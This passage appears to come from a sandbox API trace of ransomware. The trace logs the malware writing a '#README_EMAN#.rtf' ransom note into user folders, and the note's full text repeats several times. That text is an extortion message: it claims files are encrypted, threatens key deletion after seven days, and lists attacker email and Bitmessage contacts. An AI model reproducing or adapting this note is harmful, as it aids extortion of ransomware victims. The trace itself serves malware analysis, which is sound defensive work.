by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nEwJVUzEVMBMGA1UEChMMRGl\x93/", lpUsedDefaultChar=0x0) returned 8717 [0298.800] WriteFile (in: hFile=0x27c, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.801] CloseHandle (hObject=0x27c) returned 1 [0298.801] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\es\\#readme_eman#.rtf")) returned 0xffffffff [0298.801] GetLastError () returned 0x2 [0298.801] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\es\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your 